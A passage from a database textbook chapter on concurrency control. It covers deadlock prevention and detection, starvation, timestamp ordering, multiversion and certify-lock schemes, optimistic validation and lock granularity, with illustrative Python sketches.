T itself is the only transaction holding the read lock on X, the system upgrades the
lock to write_locked and permits the write_item(X) operation by T. Finally, if the
state of LOCK(X) is unlocked, the system grants the write_lock(X) request and per-
mits the write_item(X) operation to execute. After each action, the system must
update its lock table appropriately.
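
To make this concrete, the following Python sketch shows how a transaction manager could generate the lock requests on a transaction's behalf: read_item and write_item acquire the appropriate lock first, and all locks are released only at commit or abort. The class name is ours, it reuses the RWLockManager sketched earlier, and a plain dictionary stands in for the stored database; because shared locks are also held to the end, the sketch is actually the rigorous variant, which satisfies strict 2PL as well.

    class StrictTwoPhaseTransaction:
        """Sketch: the system issues lock requests for T and releases everything at the end."""

        def __init__(self, tid, lock_mgr, db):
            self.tid, self.lock_mgr, self.db = tid, lock_mgr, db
            self.locked_items = set()
            self.local_writes = {}              # updates buffered until commit

        def read_item(self, item):
            self.lock_mgr.read_lock(item, self.tid)    # may block, or upgrade later on a write
            self.locked_items.add(item)
            return self.local_writes.get(item, self.db.get(item))

        def write_item(self, item, value):
            self.lock_mgr.write_lock(item, self.tid)   # exclusive access before writing
            self.locked_items.add(item)
            self.local_writes[item] = value

        def commit(self):
            self.db.update(self.local_writes)          # make the writes visible
            self._release_all()                        # locks released only now (rigorous 2PL)

        def abort(self):
            self.local_writes.clear()                  # discard the transaction's changes
            self._release_all()

        def _release_all(self):
            for item in self.locked_items:
                self.lock_mgr.unlock(item, self.tid)
            self.locked_items.clear()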

The use of locks can cause two additional problems: deadlock and starvation. We
discuss these problems and their solutions in the next section.

1.3 Dealing with Deadlock and Starvation
Deadlock occurs when each transaction T in a set of two or more transactions is
waiting for some item that is locked by some other transaction T′ in the set. Hence,
each transaction in the set is in a waiting queue, waiting for one of the other trans-
actions in the set to release the lock on an item. But because the other transaction is
also waiting, it will never release the lock. A simple example is shown in Figure 5(a),
where the two transactions T1′ and T2′ are deadlocked in a partial schedule; T1′ is in
the waiting queue for X, which is locked by T2′, while T2′ is in the waiting queue for
Y, which is locked by T1′. Meanwhile, neither T1′ nor T2′ nor any other transaction
can access items X and Y.

Deadlock Prevention Protocols. One way to prevent deadlock is to use a
deadlock prevention protocol.5 One deadlock prevention protocol, which is used

5These protocols are not generally used in practice, either because of unrealistic assumptions or
because of their possible overhead. Deadlock detection and timeouts (covered in the following sections)
are more practical.


(a) A partial schedule of T1′ and T2′ that is in a state of deadlock (time runs downward):

    T1′: read_lock(Y); read_item(Y);
    T2′: read_lock(X); read_item(X);
    T1′: write_lock(X);     (T1′ waits: X is locked by T2′)
    T2′: write_lock(Y);     (T2′ waits: Y is locked by T1′)

(b) The wait-for graph for (a): T1′ → T2′ (T1′ waits for X) and T2′ → T1′ (T2′ waits for Y);
    the cycle indicates deadlock.

Figure 5: Illustrating the deadlock problem. (a) A partial schedule of T1′ and T2′ that is
in a state of deadlock. (b) A wait-for graph for the partial schedule in (a).

in conservative two-phase locking, requires that every transaction lock all the items
it needs in advance (which is generally not a practical assumption)—if any of the
items cannot be obtained, none of the items are locked. Rather, the transaction waits
and then tries again to lock all the items it needs. Obviously this solution further
limits concurrency. A second protocol, which also limits concurrency, involves
ordering all the items in the database and making sure that a transaction that needs
several items will lock them according to that order. This requires that the program-
mer (or the system) is aware of the chosen order of the items, which is also not prac-
tical in the database context.

A number of other deadlock prevention schemes have been proposed that make a
decision about what to do with a transaction involved in a possible deadlock situa-
tion: Should it be blocked and made to wait or should it be aborted, or should the
transaction preempt and abort another transaction? Some of these techniques use
the concept of transaction timestamp TS(T), which is a unique identifier assigned
to each transaction. The timestamps are typically based on the order in which trans-
actions are started; hence, if transaction T1 starts before transaction T2, then TS(T1)
< TS(T2). Notice that the older transaction (which starts first) has the smaller
timestamp value. Two schemes that prevent deadlock are called wait-die and
wound-wait. Suppose that transaction Ti tries to lock an item X but is not able to
because X is locked by some other transaction Tj with a conflicting lock. The rules
followed by these schemes are:

■ Wait-die. If TS(Ti) < TS(Tj), then (Ti older than Tj) Ti is allowed to wait;
otherwise (Ti younger than Tj) abort Ti (Ti dies) and restart it later with the same
timestamp.

■ Wound-wait. If TS(Ti) < TS(Tj), then (Ti older than Tj) abort Tj (Ti wounds Tj)
and restart it later with the same timestamp; otherwise (Ti younger than Tj) Ti is
allowed to wait.

In wait-die, an older transaction is allowed to wait for a younger transaction, whereas
a younger transaction requesting an item held by an older transaction is aborted and
restarted. The wound-wait approach does the opposite: A younger transaction is
allowed to wait for an older one, whereas an older transaction requesting an item held
by a younger transaction preempts the younger transaction by aborting it. Both schemes
end up aborting the younger of the two transactions (the transaction that started later)
that may be involved in a deadlock, assuming that this will waste less processing. It
can be shown that these two techniques are deadlock-free, since in wait-die,
transactions only wait for younger transactions so no cycle is created. Similarly, in
wound-wait, transactions only wait for older transactions so no cycle is created.
However, both techniques may cause some transactions to be aborted and restarted
needlessly, even though those transactions may never actually cause a deadlock.

Another group of protocols that prevent deadlock do not require timestamps. These
include the no waiting (NW) and cautious waiting (CW) algorithms. In the no waiting
algorithm, if a transaction is unable to obtain a lock, it is immediately aborted and then
restarted after a certain time delay without checking whether a deadlock will actually
occur or not. In this case, no transaction ever waits, so no deadlock will occur. However,
this scheme can cause transactions to abort and restart needlessly. The cautious waiting
algorithm was proposed to try to reduce the number of needless aborts/restarts. Suppose
that transaction Ti tries to lock an item X but is not able to do so because X is locked by
some other transaction Tj with a conflicting lock. The cautious waiting rules are as
follows:

■ Cautious waiting. If Tj is not blocked (not waiting for some other locked item),
then Ti is blocked and allowed to wait; otherwise abort Ti.

It can be shown that cautious waiting is deadlock-free, because no transaction will ever
wait for another blocked transaction. By considering the time b(T) at which each blocked
transaction T was blocked, if the two transactions Ti and Tj above both become blocked,
and Ti is waiting for Tj, then b(Ti) < b(Tj), since Ti can only wait for Tj at a time when
Tj is not blocked itself. Hence, the blocking times form a total ordering on all blocked
transactions, so no cycle that causes deadlock can occur.
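
The two timestamp-based prevention rules reduce to a small decision function. The Python fragment below is a minimal sketch only (the function name and the returned action strings are our own, and cautious waiting is not modeled); a real lock manager would itself abort the indicated transaction or enqueue the waiter.

    def resolve_lock_conflict(ts_requester, ts_holder, scheme="wait-die"):
        """Ti (requester) wants an item held with a conflicting lock by Tj (holder).
        Returns which transaction to abort, or 'wait' to block the requester.
        Aborted transactions are restarted later with their original timestamps."""
        older_requester = ts_requester < ts_holder        # smaller timestamp = older transaction
        if scheme == "wait-die":
            return "wait" if older_requester else "abort requester"   # the young requester dies
        if scheme == "wound-wait":
            return "abort holder" if older_requester else "wait"      # the old requester wounds Tj
        raise ValueError("unknown scheme")

    # Example: T1 (TS = 5) requests an item held by the younger T2 (TS = 9).
    print(resolve_lock_conflict(5, 9, "wait-die"))    # -> 'wait'         (the older T1 waits)
    print(resolve_lock_conflict(5, 9, "wound-wait"))  # -> 'abort holder' (T1 wounds the younger T2)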
Deadlock Detection. A second, more practical approach to dealing with deadlock is
deadlock detection, where the system checks if a state of deadlock actually exists. This
solution is attractive if we know there will be little interference among the
transactions—that is, if different transactions will rarely access the same items at the
same time. This can happen if the transactions are short and each transaction locks only
a few items, or if the transaction load is light. On the other hand, if transactions are long
and each transaction uses many items, or if the transaction load is quite heavy, it may be
advantageous to use a deadlock prevention scheme.

A simple way to detect a state of deadlock is for the system to construct and maintain a
wait-for graph. One node is created in the wait-for graph for each transaction that is
currently executing. Whenever a transaction Ti is waiting to lock an item X that is
currently locked by a transaction Tj, a directed edge (Ti → Tj) is created in the wait-for
graph. When Tj releases the lock(s) on the items that Ti was waiting for, the directed
edge is dropped from the wait-for graph. We have a state of deadlock if and only if the
wait-for graph has a cycle. One problem with this approach is the matter of determining
when the system should check for a deadlock. One possibility is to check for a cycle
every time an edge is added to the wait-for graph, but this may cause excessive overhead.
Criteria such as the number of currently executing transactions or the period of time
several transactions have been waiting to lock items may be used instead to check for a
cycle. Figure 5(b) shows the wait-for graph for the (partial) schedule shown in Figure 5(a).

If the system is in a state of deadlock, some of the transactions causing the deadlock
must be aborted. Choosing which transactions to abort is known as victim selection.
The algorithm for victim selection should generally avoid selecting transactions that
have been running for a long time and that have performed many updates, and it should
try instead to select transactions that have not made many changes (younger
transactions).
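
A wait-for graph and its cycle test are straightforward to sketch. The Python fragment below is illustrative only (the class and method names are our own simplifications); it adds an edge when a transaction blocks, drops the edges when the holder releases its locks, and looks for a cycle with a depth-first search. Victim selection is left to the caller.

    class WaitForGraph:
        """Sketch of deadlock detection: nodes are transactions, edge Ti -> Tj means Ti waits for Tj."""

        def __init__(self):
            self.edges = {}                       # transaction -> set of transactions it waits for

        def add_wait(self, ti, tj):
            self.edges.setdefault(ti, set()).add(tj)

        def remove_waits_on(self, tj):
            for waits in self.edges.values():     # Tj released its locks
                waits.discard(tj)

        def has_cycle(self):
            visited, on_stack = set(), set()

            def dfs(node):
                visited.add(node)
                on_stack.add(node)
                for nxt in self.edges.get(node, ()):
                    if nxt in on_stack or (nxt not in visited and dfs(nxt)):
                        return True               # back edge found: a cycle, hence deadlock
                on_stack.discard(node)
                return False

            return any(dfs(t) for t in list(self.edges) if t not in visited)

    # The deadlock of Figure 5: T1' waits for T2' (item X) and T2' waits for T1' (item Y).
    g = WaitForGraph()
    g.add_wait("T1'", "T2'")
    g.add_wait("T2'", "T1'")
    print(g.has_cycle())   # True -> a victim must be selected and aborted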
Timeouts. Another simple scheme to deal with deadlock is the use of timeouts. This
method is practical because of its low overhead and simplicity. In this method, if a
transaction waits for a period longer than a system-defined timeout period, the system
assumes that the transaction may be deadlocked and aborts it—regardless of whether a
deadlock actually exists or not.

Starvation. Another problem that may occur when we use locking is starvation, which
occurs when a transaction cannot proceed for an indefinite period of time while other
transactions in the system continue normally. This may occur if the waiting scheme for
locked items is unfair, giving priority to some transactions over others. One solution for
starvation is to have a fair waiting scheme, such as using a first-come-first-served queue;
transactions are enabled to lock an item in the order in which they originally requested
the lock. Another scheme allows some transactions to have priority over others but
increases the priority of a transaction the longer it waits, until it eventually gets the
highest priority and proceeds. Starvation can also occur because of victim selection if
the algorithm selects the same transaction as victim repeatedly, thus causing it to abort
and never finish execution. The algorithm can use higher priorities for transactions that
have been aborted multiple times to avoid this problem. The wait-die and wound-wait
schemes discussed previously avoid starvation, because they restart a transaction that
has been aborted with its same original timestamp, so the possibility that the same
transaction is aborted repeatedly is slim.

2 Concurrency Control Based on Timestamp Ordering

The use of locks, combined with the 2PL protocol, guarantees serializability of
schedules. The serializable schedules produced by 2PL have their equivalent serial
schedules based on the order in which executing transactions lock the items they
acquire. If a transaction needs an item that is already locked, it may be forced to wait
until the item is released. Some transactions may be aborted and restarted because of
the deadlock problem. A different approach that guarantees serializability involves
using transaction timestamps to order transaction execution for an equivalent serial
schedule. In Section 2.1 we discuss timestamps, and in Section 2.2 we discuss how
serializability is enforced by ordering transactions based on their timestamps.

2.1 Timestamps
Recall that a timestamp is a unique identifier created by the DBMS to identify a
transaction. Typically, timestamp values are assigned in the order in which the
transactions are submitted to the system, so a timestamp can be thought of as the
transaction start time. We will refer to the timestamp of transaction T as TS(T).
Concurrency control techniques based on timestamp ordering do not use locks; hence,
deadlocks cannot occur.

Timestamps can be generated in several ways. One possibility is to use a counter that is
incremented each time its value is assigned to a transaction. The transaction timestamps
are numbered 1, 2, 3, ... in this scheme. A computer counter has a finite maximum value,
so the system must periodically reset the counter to zero when no transactions are
executing for some short period of time. Another way to implement timestamps is to use
the current date/time value of the system clock and ensure that no two timestamp values
are generated during the same tick of the clock.

2.2 The Timestamp Ordering Algorithm
The idea for this scheme is to order the transactions based on their timestamps. A
schedule in which the transactions participate is then serializable, and the only
equivalent serial schedule permitted has the transactions in order of their timestamp
values. This is called timestamp ordering (TO). Notice how this differs from 2PL, where
a schedule is serializable by being equivalent to some serial schedule allowed by the
locking protocols. In timestamp ordering, however, the schedule is equivalent to the
particular serial order corresponding to the order of the transaction timestamps. The
algorithm must ensure that, for each item accessed by conflicting operations in the
schedule, the order in which the item is accessed does not violate the timestamp order.
To do this, the algorithm associates with each database item X two timestamp (TS)
values:

1. read_TS(X). The read timestamp of item X is the largest timestamp among all
the timestamps of transactions that have successfully read item X—that is,
read_TS(X) = TS(T), where T is the youngest transaction that has read X successfully.

2. write_TS(X). The write timestamp of item X is the largest of all the timestamps
of transactions that have successfully written item X—that is, write_TS(X) = TS(T),
where T is the youngest transaction that has written X successfully.
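
A hedged Python sketch of this bookkeeping, assuming a counter-based timestamp generator and a table of per-item read and write timestamps; the names TimestampState and new_transaction_ts are ours, and the clock-based alternative is only noted in a comment.

    import itertools

    class TimestampState:
        """Sketch of the data kept by a timestamp-ordering scheduler."""

        def __init__(self):
            self._counter = itertools.count(1)   # counter-based timestamps 1, 2, 3, ...
                                                 # (a clock-based scheme would use the system
                                                 #  time plus a tie-break within one tick)
            self.read_ts = {}                    # item -> largest TS of a successful reader
            self.write_ts = {}                   # item -> largest TS of a successful writer

        def new_transaction_ts(self):
            return next(self._counter)           # TS(T), assigned when the transaction starts

    ts_state = TimestampState()
    t1, t2 = ts_state.new_transaction_ts(), ts_state.new_transaction_ts()   # t1 < t2, so T1 is older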
Basic Timestamp Ordering (TO). Whenever some transaction T tries to issue a
read_item(X) or a write_item(X) operation, the basic TO algorithm compares the
timestamp of T with read_TS(X) and write_TS(X) to ensure that the timestamp order of
transaction execution is not violated. If this order is violated, then transaction T is
aborted and resubmitted to the system as a new transaction with a new timestamp. If T
is aborted and rolled back, any transaction T1 that may have used a value written by T
must also be rolled back. Similarly, any transaction T2 that may have used a value
written by T1 must also be rolled back, and so on. This effect is known as cascading
rollback and is one of the problems associated with basic TO, since the schedules
produced are not guaranteed to be recoverable. An additional protocol must be enforced
to ensure that the schedules are recoverable, cascadeless, or strict. We first describe the
basic TO algorithm here. The concurrency control algorithm must check whether
conflicting operations violate the timestamp ordering in the following two cases:

1. Whenever a transaction T issues a write_item(X) operation, the following is
checked:

a. If read_TS(X) > TS(T) or if write_TS(X) > TS(T), then abort and roll back
T and reject the operation. This should be done because some younger
transaction with a timestamp greater than TS(T)—and hence after T in
the timestamp ordering—has already read or written the value of item X
before T had a chance to write X, thus violating the timestamp ordering.

b. If the condition in part (a) does not occur, then execute the write_item(X)
operation of T and set write_TS(X) to TS(T).

2. Whenever a transaction T issues a read_item(X) operation, the following is
checked:

a. If write_TS(X) > TS(T), then abort and roll back T and reject the opera-
tion. This should be done because some younger transaction with time-
stamp greater than TS(T)—and hence after T in the timestamp
ordering—has already written the value of item X before T had a chance
to read X.

b. If write_TS(X) ≤ TS(T), then execute the read_item(X) operation of T and
set read_TS(X) to the larger of TS(T) and the current read_TS(X).
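
The two checks above translate directly into code. The following Python sketch is illustrative only: it keeps read_TS and write_TS in plain dictionaries, with an assumed default of 0 for items never accessed, and returns 'abort' whenever the timestamp order would be violated.

    read_TS = {}    # item -> largest timestamp of a successful reader (0 if never read)
    write_TS = {}   # item -> largest timestamp of a successful writer (0 if never written)

    def basic_to_write(ts_t, item):
        """Case 1: the transaction with timestamp ts_t issues write_item(item)."""
        if read_TS.get(item, 0) > ts_t or write_TS.get(item, 0) > ts_t:
            return "abort"                               # a younger transaction already read or wrote X
        write_TS[item] = ts_t                            # execute the write and set write_TS(X) = TS(T)
        return "ok"

    def basic_to_read(ts_t, item):
        """Case 2: the transaction with timestamp ts_t issues read_item(item)."""
        if write_TS.get(item, 0) > ts_t:
            return "abort"                               # a younger transaction already wrote X
        read_TS[item] = max(ts_t, read_TS.get(item, 0))  # read_TS(X) = max(TS(T), read_TS(X))
        return "ok"

    # Example: a transaction with TS = 2 writes X; an older one with TS = 1 then tries to read X.
    basic_to_write(2, "X")
    print(basic_to_read(1, "X"))    # -> 'abort'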

Whenever the basic TO algorithm detects two conflicting operations that occur in the
incorrect order, it rejects the later of the two operations by aborting the transaction
that issued it. The schedules produced by basic TO are hence guaranteed to be
conflict serializable, like the 2PL protocol. However, some schedules are possible
under each protocol that are not allowed under the other. Thus, neither protocol
allows all possible serializable schedules. As mentioned earlier, deadlock does not
occur with timestamp ordering. However, cyclic restart (and hence starvation) may
occur if a transaction is continually aborted and restarted.

Strict Timestamp Ordering (TO). A variation of basic TO called strict TO
ensures that the schedules are both strict (for easy recoverability) and (conflict)
serializable. In this variation, a transaction T that issues a read_item(X) or
write_item(X) such that TS(T) > write_TS(X) has its read or write operation delayed
until the transaction T′ that wrote the value of X (hence TS(T′) = write_TS(X)) has
committed or aborted. To implement this algorithm, it is necessary to simulate the
locking of an item X that has been written by transaction T′ until T′ is either com-
mitted or aborted. This algorithm does not cause deadlock, since T waits for T′ only
if TS(T) > TS(T′).

Thomas’s Write Rule. A modification of the basic TO algorithm, known as
Thomas’s write rule, does not enforce conflict serializability, but it rejects fewer
write operations by modifying the checks for the write_item(X) operation as
follows:

1. If read_TS(X) > TS(T), then abort and roll back T and reject the operation.

2. If write_TS(X) > TS(T), then do not execute the write operation but continue
processing. This is because some transaction with timestamp greater than
TS(T)—and hence after T in the timestamp ordering—has already written
the value of X. Thus, we must ignore the write_item(X) operation of T
because it is already outdated and obsolete. Notice that any conflict arising
from this situation would be detected by case (1).

3. If neither the condition in part (1) nor the condition in part (2) occurs, then
execute the write_item(X) operation of T and set write_TS(X) to TS(T).
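
As a rough illustration, Thomas's write rule changes only the write check; in the sketch below (same illustrative dictionary representation with a default of 0), an outdated write is silently ignored rather than causing an abort.

    def thomas_write(ts_t, item, read_TS, write_TS):
        """Write check under Thomas's write rule for a transaction with timestamp ts_t."""
        if read_TS.get(item, 0) > ts_t:
            return "abort"        # rule 1: a younger transaction has already read X
        if write_TS.get(item, 0) > ts_t:
            return "ignore"       # rule 2: the write is obsolete; skip it but keep processing
        write_TS[item] = ts_t     # rule 3: perform the write and set write_TS(X) = TS(T)
        return "ok"

    # Example: a transaction with TS = 3 has written X; a late write by TS = 2 is simply ignored.
    r, w = {}, {"X": 3}
    print(thomas_write(2, "X", r, w))   # -> 'ignore'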

3 Multiversion Concurrency
Control Techniques

Other protocols for concurrency control keep the old values of a data item when the
item is updated. These are known as multiversion concurrency control, because
several versions (values) of an item are maintained. When a transaction requires
access to an item, an appropriate version is chosen to maintain the serializability of
the currently executing schedule, if possible. The idea is that some read operations
that would be rejected in other techniques can still be accepted by reading an older
version of the item to maintain serializability. When a transaction writes an item, it
writes a new version and the old version(s) of the item are retained. Some multiver-
sion concurrency control algorithms use the concept of view serializability rather
than conflict serializability.

An obvious drawback of multiversion techniques is that more storage is needed to
maintain multiple versions of the database items. However, older versions may have
to be maintained anyway—for example, for recovery purposes. In addition, some
database applications require older versions to be kept to maintain a history of the
evolution of data item values. The extreme case is a temporal database, which keeps
track of all changes and the times at which they occurred. In such cases, there is no
additional storage penalty for multiversion techniques, since older versions are
already maintained.

Several multiversion concurrency control schemes have been proposed. We discuss
two schemes here, one based on timestamp ordering and the other based on 2PL. In
addition, the validation concurrency control method (see Section 4) also maintains
multiple versions.


3.1 Multiversion Technique Based on Timestamp Ordering
In this method, several versions X1, X2, …, Xk of each data item X are maintained.
For each version, the value of version Xi and the following two timestamps are kept:

1. read_TS(Xi). The read timestamp of Xi is the largest of all the timestamps of
transactions that have successfully read version Xi.

2. write_TS(Xi). The write timestamp of Xi is the timestamp of the transac-
tion that wrote the value of version Xi.

Whenever a transaction T is allowed to execute a write_item(X) operation, a new ver-
sion Xk+1 of item X is created, with both the write_TS(Xk+1) and the read_TS(Xk+1)
set to TS(T). Correspondingly, when a transaction T is allowed to read the value of
version Xi, the value of read_TS(Xi) is set to the larger of the current read_TS(Xi) and
TS(T).

To ensure serializability, the following rules are used:

1. If transaction T issues a write_item(X) operation, and version i of X has the
highest write_TS(Xi) of all versions of X that is also less than or equal to TS(T),
and read_TS(Xi) > TS(T), then abort and roll back transaction T; otherwise,
create a new version Xj of X with read_TS(Xj) = write_TS(Xj) = TS(T).

2. If transaction T issues a read_item(X) operation, find the version i of X that
has the highest write_TS(Xi) of all versions of X that is also less than or equal
to TS(T); then return the value of Xi to transaction T, and set the value of
read_TS(Xi) to the larger of TS(T) and the current read_TS(Xi).

As we can see in case 2, a read_item(X) is always successful, since it finds the appro-
priate version Xi to read based on the write_TS of the various existing versions of X.
In case 1, however, transaction T may be aborted and rolled back. This happens if T
attempts to write a version of X that should have been read by another transaction
T′ whose timestamp is read_TS(Xi); however, T′ has already read version Xi, which
was written by the transaction with timestamp equal to write_TS(Xi). If this conflict
occurs, T is rolled back; otherwise, a new version of X, written by transaction T, is
created. Notice that if T is rolled back, cascading rollback may occur. Hence, to
ensure recoverability, a transaction T should not be allowed to commit until after all
the transactions that have written some version that T has read have committed.
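
A minimal sketch of these two rules in Python, assuming each version of X is stored as a dictionary with value, read_ts, and write_ts fields and that an initial version with write_TS = 0 always exists; the representation and function names are ours, and the recoverability check just described is omitted.

    def mv_read(versions, ts_t):
        """Rule 2: read the version with the largest write_TS <= TS(T); this always succeeds."""
        v = max((v for v in versions if v["write_ts"] <= ts_t), key=lambda v: v["write_ts"])
        v["read_ts"] = max(v["read_ts"], ts_t)
        return v["value"]

    def mv_write(versions, ts_t, value):
        """Rule 1: abort if the chosen version was already read by a younger transaction."""
        v = max((v for v in versions if v["write_ts"] <= ts_t), key=lambda v: v["write_ts"])
        if v["read_ts"] > ts_t:
            return "abort"                      # some younger transaction has read that version
        versions.append({"value": value, "read_ts": ts_t, "write_ts": ts_t})
        return "ok"

    # Versions of X: the initial version has write_TS = 0.
    X = [{"value": 10, "read_ts": 0, "write_ts": 0}]
    mv_write(X, 2, 20)          # a transaction with TS = 2 creates a version with write_TS = 2
    print(mv_read(X, 1))        # an older transaction with TS = 1 still reads the old version -> 10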

3.2 Multiversion Two-Phase Locking Using Certify Locks
In this multiple-mode locking scheme, there are three locking modes for an item:
read, write, and certify, instead of just the two modes (read, write) discussed previ-
ously. Hence, the state of LOCK(X) for an item X can be one of read-locked, write-
locked, certify-locked, or unlocked. In the standard locking scheme, with only read
and write locks (see Section 1.1), a write lock is an exclusive lock. We can describe
the relationship between read and write locks in the standard scheme by means of
the lock compatibility table shown in Figure 6(a). An entry of Yes means that if a
transaction T holds the type of lock specified in the column header on item X and if

transaction T′ requests the type of lock specified in the row header on the same item
X, then T′ can obtain the lock because the locking modes are compatible. On the
other hand, an entry of No in the table indicates that the locks are not compatible,
so T′ must wait until T releases the lock.

(a) Read/write locking scheme:

                Read    Write
    Read        Yes     No
    Write       No      No

(b) Read/write/certify locking scheme:

                Read    Write   Certify
    Read        Yes     Yes     No
    Write       Yes     No      No
    Certify     No      No      No

Figure 6: Lock compatibility tables. (a) A compatibility table for the read/write locking
scheme. (b) A compatibility table for the read/write/certify locking scheme.

In the standard locking scheme, once a transaction obtains a write lock on an item,
no other transactions can access that item. The idea behind multiversion 2PL is to
allow other transactions T′ to read an item X while a single transaction T holds a
write lock on X. This is accomplished by allowing two versions for each item X; one
version must always have been written by some committed transaction. The second
version X′ is created when a transaction T acquires a write lock on the item. Other
transactions can continue to read the committed version of X while T holds the write
lock. Transaction T can write the value of X′ as needed, without affecting the value
of the committed version X. However, once T is ready to commit, it must obtain a
certify lock on all items that it currently holds write locks on before it can commit.
The certify lock is not compatible with read locks, so the transaction may have to
delay its commit until all its write-locked items are released by any reading transac-
tions in order to obtain the certify locks. Once the certify locks—which are exclusive
locks—are acquired, the committed version X of the data item is set to the value of
version X′, version X′ is discarded, and the certify locks are then released. The lock
compatibility table for this scheme is shown in Figure 6(b).

In this multiversion 2PL scheme, reads can proceed concurrently with a single write
operation—an arrangement not permitted under the standard 2PL schemes. The
cost is that a transaction may have to delay its commit until it obtains exclusive cer-
tify locks on all the items it has updated. It can be shown that this scheme avoids cas-
cading aborts, since transactions are only allowed to read the version X that was
written by a committed transaction. However, deadlocks may occur if upgrading of
a read lock to a write lock is allowed, and these must be handled by variations of the
techniques discussed in Section 1.3.
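
The compatibility table of Figure 6(b) can be encoded directly, and a requested lock is granted only if it is compatible with every lock currently held on the item by other transactions. The following Python lines are a sketch only; the table encoding and helper name are our own.

    # Figure 6(b): may the requested lock (first entry) be granted given a held lock (second entry)?
    COMPATIBLE = {
        ("read",    "read"):  True,  ("read",    "write"): True,  ("read",    "certify"): False,
        ("write",   "read"):  True,  ("write",   "write"): False, ("write",   "certify"): False,
        ("certify", "read"):  False, ("certify", "write"): False, ("certify", "certify"): False,
    }

    def can_grant(requested_mode, held_modes):
        """Grant the request only if it is compatible with all locks held by other transactions."""
        return all(COMPATIBLE[(requested_mode, held)] for held in held_modes)

    # A transaction may read X while another holds a write lock (it reads the committed version),
    # but the writer cannot obtain its certify lock until the readers are done.
    print(can_grant("read", ["write"]))      # True
    print(can_grant("certify", ["read"]))    # False -> the commit is delayed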


4 Validation (Optimistic) Concurrency Control
Techniques

In all the concurrency control techniques we have discussed so far, a certain degree
of checking is done before a database operation can be executed. For example, in
locking, a check is done to determine whether the item being accessed is locked. In
timestamp ordering, the transaction timestamp is checked against the read and
write timestamps of the item. Such checking represents overhead during transac-
tion execution, with the effect of slowing down the transactions.

In optimistic concurrency control techniques, also known as validation or
certification techniques, no checking is done while the transaction is executing.
Several theoretical concurrency control methods are based on the validation tech-
nique. We will describe only one scheme here. In this scheme, updates in the trans-
action are not applied directly to the database items until the transaction reaches its
end. During transaction execution, all updates are applied to local copies of the data
items that are kept for the transaction.6 At the end of transaction execution, a
validation phase checks whether any of the transaction’s updates violate serializ-
ability. Certain information needed by the validation phase must be kept by the sys-
tem. If serializability is not violated, the transaction is committed and the database
is updated from the local copies; otherwise, the transaction is aborted and then
restarted later.

There are three phases for this concurrency control protocol:

1. Read phase. A transaction can read values of committed data items from the
database. However, updates are applied only to local copies (versions) of the
data items kept in the transaction workspace.

2. Validation phase. Checking is performed to ensure that serializability will
not be violated if the transaction updates are applied to the database.

3. Write phase. If the validation phase is successful, the transaction updates are
applied to the database; otherwise, the updates are discarded and the trans-
action is restarted.

The idea behind optimistic concurrency control is to do all the checks at once;
hence, transaction execution proceeds with a minimum of overhead until the vali-
dation phase is reached. If there is little interference among transactions, most will
be validated successfully. However, if there is much interference, many transactions
that execute to completion will have their results discarded and must be restarted
later. Under these circumstances, optimistic techniques do not work well. The tech-
niques are called optimistic because they assume that little interference will occur
and hence that there is no need to do checking during transaction execution.

The optimistic protocol we describe uses transaction timestamps and also requires
that the write_sets and read_sets of the transactions be kept by the system.
Additionally, start and end times for some of the three phases need to be kept for

6Note that this can be considered as keeping multiple versions of items!


each transaction. Recall that the write_set of a transaction is the set of items it writes,
and the read_set is the set of items it reads. In the validation phase for transaction Ti,
the protocol checks that Ti does not interfere with any committed transactions or
with any other transactions currently in their validation phase. The validation phase
for Ti checks that, for each such transaction Tj that is either committed or is in its
validation phase, one of the following conditions holds:

1. Transaction Tj completes its write phase before Ti starts its read phase.

2. Ti starts its write phase after Tj completes its write phase, and the read_set
of Ti has no items in common with the write_set of Tj.

3. Both the read_set and write_set of Ti have no items in common with the
write_set of Tj, and Tj completes its read phase before Ti completes its read
phase.

When validating transaction Ti, the first condition is checked first for each transac-
tion Tj, since (1) is the simplest condition to check. Only if condition 1 is false is
condition 2 checked, and only if (2) is false is condition 3—the most complex to
evaluate—checked. If any one of these three conditions holds, there is no interfer-
ence and Ti is validated successfully. If none of these three conditions holds, the val-
idation of transaction Ti fails and it is aborted and restarted later because
interference may have occurred.
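
A hedged Python sketch of this validation test, assuming each transaction object records its read_set, write_set, and the start and end times of its phases; all attribute and function names are our own convention.

    from types import SimpleNamespace as T

    def validate(ti, others):
        """Return True if Ti passes validation against every committed or validating Tj."""
        for tj in others:
            if tj is ti:
                continue
            if tj.write_phase_end <= ti.read_phase_start:
                continue                                        # condition 1: Tj finished before Ti began
            if (tj.write_phase_end <= ti.write_phase_start
                    and not (ti.read_set & tj.write_set)):
                continue                                        # condition 2: no read_set/write_set overlap
            if (not (ti.read_set & tj.write_set)
                    and not (ti.write_set & tj.write_set)
                    and tj.read_phase_end < ti.read_phase_end):
                continue                                        # condition 3: no overlap at all, Tj read first
            return False                                        # interference possible: abort and restart Ti
        return True

    # Example: Tj committed before Ti started reading, so condition 1 holds and Ti validates.
    tj = T(read_set={"X"}, write_set={"X"}, read_phase_start=0, read_phase_end=1,
           write_phase_start=1, write_phase_end=2)
    ti = T(read_set={"X"}, write_set={"Y"}, read_phase_start=3, read_phase_end=4,
           write_phase_start=4, write_phase_end=5)
    print(validate(ti, [tj]))   # True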

5 Granularity of Data Items and Multiple
Granularity Locking

All concurrency control techniques assume that the database is formed of a number
of named data items. A database item could be chosen to be one of the following:

■ A database record

■ A field value of a database record

■ A disk block

■ A whole file

■ The whole database

The granularity can affect the performance of concurrency control and recovery. In
Section 5.1, we discuss some of the tradeoffs with regard to choosing the granular-
ity level used for locking, and in Section 5.2 we discuss a multiple granularity lock-
ing scheme, where the granularity level (size of the data item) may be changed
dynamically.

5.1 Granularity Level Considerations for Locking
The size of data items is often called the data item granularity. Fine granularity
refers to small item sizes, whereas coarse granularity refers to large item sizes. Several
tradeoffs must be considered in choosing the data item size. We will discuss data
item size in the context of locking, although similar arguments can be made for
other concurrency control techniques.


[Figure 7 shows a granularity hierarchy: the root node db has two files, f1 and f2, as its
children; file f1 contains pages p11, p12, ..., p1n and file f2 contains pages p21, p22, ...,
p2m; each page in turn contains several records (for example, page p11 contains records
r111 ... r11j, page p1n contains r1n1 ... r1nj, and page p2m contains r2m1 ... r2mk).]

Figure 7: A granularity hierarchy for illustrating multiple granularity level locking.

First, notice that the larger the data item size is, the lower the degree of concurrency
permitted. For example, if the data item size is a disk block, a transaction T that
needs to lock a record B must lock the whole disk block X that contains B because a
lock is associated with the whole data item (block). Now, if another transaction S
wants to lock a different record C that happens to reside in the same block X in a
conflicting lock mode, it is forced to wait. If the data item size was a single record,
transaction S would be able to proceed, because it would be locking a different data
item (record).

On the other hand, the smaller the data item size is, the more the number of items
in the database. Because every item is associated with a lock, the system will have a
